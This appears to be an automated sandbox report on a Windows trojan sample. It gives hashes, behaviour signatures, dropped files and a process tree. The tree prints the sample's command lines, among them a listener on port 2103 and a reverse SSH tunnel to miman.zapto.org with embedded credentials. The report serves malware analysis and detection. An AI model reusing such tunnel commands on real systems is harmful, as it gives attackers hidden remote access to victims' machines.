Overview

overview

8

Static

static

8

baa8b0e7b6...d2.exe

windows7-x64

8

baa8b0e7b6...d2.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    99s
  • max time network
    177s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2022, 01:33

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe

  • Size

    220KB

  • MD5

    6d575e2b2085a08b5fea5df2150d6b72

  • SHA1

    9c66c7bc798b327ac99f6baec07c4a8bc5939de2

  • SHA256

    baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2

  • SHA512

    b4f527ef670d32c9c9d9133aa3558746528542f7f118a07d9536892872b17d4680e00dee5051b939f6fdb20f82adb7ee10cc272cd63e9d891f706ee0c3f01911

  • SSDEEP

    6144:WBbIlDMskSTJr1My5deF/pnWBSoh138n6gj1rV:4qMstrJ8n6O1rV

Score
8/10
evasiontrojanupx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
    adwarespyware
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe
    "C:\Users\Admin\AppData\Local\Temp\baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe"
    1⤵
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Data.Msi\startup.vbs"
      2⤵
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Data.Msi\alg.vbe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Data.Msi\cssrs.exe
          "C:\Data.Msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
          4⤵
          • Executes dropped EXE
          PID:1772
        • C:\Data.Msi\System.exe
          "C:\Data.Msi\System.exe" -ssh -R 63583:127.0.0.1:2103 miman.zapto.org -l syslog -pw 2n3055
          4⤵
          • Executes dropped EXE
          PID:1008
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:824 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:432

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Data.Msi\DiskDoctor.lnk
          Filesize

          459B

          MD5

          8f5d6310e7fcf52fcb7509930ff14813

          SHA1

          198e6182d515a46167c0193d4d8c0fd985bf3185

          SHA256

          322d1f912491ab13e5362c4e8487cba773d8cde08c35ff518c9a882979204217

          SHA512

          be491e3fa3c99525b1116b328b1ccd9d45611a6e42961ee8649ee6261713f8c07f5906bad1e7c0552f6bf9e2f6c6f9db4be15c3067f6f1dd96e6aefcbbdb05ff

          Download Submit

        • C:\Data.Msi\System.exe
          Filesize

          323KB

          MD5

          f4bf5c28bed38e31c143abfb9bebb6d5

          SHA1

          015f3e7ce4ff406f712b4ee1c893edfaa9276259

          SHA256

          d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

          SHA512

          72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

          Download Submit

        • C:\Data.Msi\System.exe
          Filesize

          323KB

          MD5

          f4bf5c28bed38e31c143abfb9bebb6d5

          SHA1

          015f3e7ce4ff406f712b4ee1c893edfaa9276259

          SHA256

          d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

          SHA512

          72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

          Download Submit

        • C:\Data.Msi\alg.vbe
          Filesize

          1KB

          MD5

          8f396209be8b9425c6b0a4e16e687d37

          SHA1

          a75efadb611686e1d35089151c2823e7ecbc5c1d

          SHA256

          a586447cd7e4ea3524b404abded0696d729f60e3d499143c6ad39708bf17777e

          SHA512

          72be21378b0f4c2cd9c3d14641dd87fcd90c217ef4a382523f099eaf6cc85528c487e25c3be79175206fe1482d78d04298c14194cb2b961e9f9d7d2ce967ee26

          Download Submit

        • C:\Data.Msi\cssrs.exe
          Filesize

          45KB

          MD5

          8152b1139e0f2a1d250415eb7161d799

          SHA1

          2bb712f173a7fbb365fea365cc33fdd11dde32d5

          SHA256

          af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f

          SHA512

          4540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51

          Download Submit

        • C:\Data.Msi\cssrs.exe
          Filesize

          45KB

          MD5

          8152b1139e0f2a1d250415eb7161d799

          SHA1

          2bb712f173a7fbb365fea365cc33fdd11dde32d5

          SHA256

          af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f

          SHA512

          4540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51

          Download Submit

        • C:\Data.Msi\pic.url
          Filesize

          138B

          MD5

          49efe6d104d450d71d2ee7c513845e83

          SHA1

          ac8423b7ea4d7d7e27b67f3c6de03244dbfd5814

          SHA256

          8f9692895b703948cfddfd5160911c214a4ee53c219175fa12afeaef8214997f

          SHA512

          dffc2ac38d1602b31128acd1d3f6f75f9e03c7c481febf8397b52d385b68d6a919ff1f6584941530cf9f80734cba0273d489cc74e50b24dc2eaa2ff7ac905503

          Download Submit

        • C:\Data.Msi\startup.vbs
          Filesize

          91B

          MD5

          7976846fe9868a7fc0328b9bb457415e

          SHA1

          f1f6d06a5212103ec3c7077acec69d6e0af5449f

          SHA256

          6d917694923ab0b71f0dfd3164bc873a3954d988db2a06002894d00c3d831c7d

          SHA512

          08b6092a5716bb6413f07b19c1073bc2cbb381b21bdfe773c719990ada8f7453ac0e1ecf60f24681c219f9af469e03fe830bd2325a05bad1c6759a1b79ff40c2

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          340B

          MD5

          aeba306e220a714916b4c01b32cb8456

          SHA1

          50d0b0549712ec7a3aa217eeadf41689dd241523

          SHA256

          6c58799b83b0be20d5b068d6c4fe0ba694663c51cff32b27d87414ba417050de

          SHA512

          34c6e34a583b4675ee8091918a8e728e6e26e81d354551ab2f2ffe01ca98c2a353ce9244b175ded67c21966dfc98b553a01d302249689c073859911b11f74969

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\M2V7917T.txt
          Filesize

          608B

          MD5

          aeee4938f7d8d30a3b62cbcc51323497

          SHA1

          d64513cfb704d00c3969eb3545ff0fdb7a5e0465

          SHA256

          390a12b58006cb0b30a4729b0d30ee021ef896cf51fb0c2429bc97168eb3d1c6

          SHA512

          aed52d64565ec93b62893c86410e6b31f9d6ecf5128c82172725f9d6968e96ddc0f2074f4dcd0511e0829f7e544b17d77876aa1f8af1a45daeb1cf146a2c11b2

          Download Submit

        • \Data.Msi\System.exe
          Filesize

          323KB

          MD5

          f4bf5c28bed38e31c143abfb9bebb6d5

          SHA1

          015f3e7ce4ff406f712b4ee1c893edfaa9276259

          SHA256

          d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

          SHA512

          72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

          Download Submit

        • \Data.Msi\System.exe
          Filesize

          323KB

          MD5

          f4bf5c28bed38e31c143abfb9bebb6d5

          SHA1

          015f3e7ce4ff406f712b4ee1c893edfaa9276259

          SHA256

          d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971

          SHA512

          72e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935

          Download Submit

        • \Data.Msi\cssrs.exe
          Filesize

          45KB

          MD5

          8152b1139e0f2a1d250415eb7161d799

          SHA1

          2bb712f173a7fbb365fea365cc33fdd11dde32d5

          SHA256

          af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f

          SHA512

          4540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51

          Download Submit

        • \Data.Msi\cssrs.exe
          Filesize

          45KB

          MD5

          8152b1139e0f2a1d250415eb7161d799

          SHA1

          2bb712f173a7fbb365fea365cc33fdd11dde32d5

          SHA256

          af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f

          SHA512

          4540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51

          Download Submit

        • memory/1932-54-0x0000000075FB1000-0x0000000075FB3000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1932-56-0x0000000000400000-0x000000000041C000-memory.dmp

          Filesize

          112KB

          Download